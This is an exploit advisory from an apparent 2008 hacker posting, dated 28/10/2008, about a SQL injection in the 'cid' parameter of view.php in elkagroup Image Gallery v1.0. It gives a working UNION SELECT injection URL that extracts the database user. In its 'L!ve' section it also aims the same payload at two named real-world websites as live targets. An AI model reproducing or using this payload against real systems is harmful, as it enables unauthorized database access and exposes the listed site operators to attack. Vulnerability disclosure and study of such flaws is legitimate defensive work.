-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
elkagroup Image Gallery v1.0 (view.php cid) Remote SQL Injection
Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script:         Image Gallery v1.0
[~] Language:         PHP
[~] Website:         http://www.elkagroup.com
[~] Affected File:     view.php
[~] Type:             Commercial
[~] Report-Date:     28/10/2008


--[ DoRK ]--
No more d0rks
sry k!dz...


--[ Founder ]--
G4N0K <mail.ganok[at]gmail.com>


--[ Exploit ]--
[~]
http://localhost/[path]/view.php?cid=-33%20UNION%20ALL%20SELECT%200,user(),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--&uid=0&new=0



--[ L!ve ]--
http://www.abfa-esfahan.com/gallery/view.php?cid=-33%20UNION%20ALL%20SELECT%200,user(),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--&uid=0&new=0
http://gallery.iraninsurance.ir/view.php?cid=-33%20UNION%20ALL%20SELECT%200,user(),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--&uid=0&new=0

--[ Greetz ]--
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>

//Are ya looking for something that has not BUGz at all...!? I know it...
It's The Holy Quran. [:-)
//ALLAH, forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=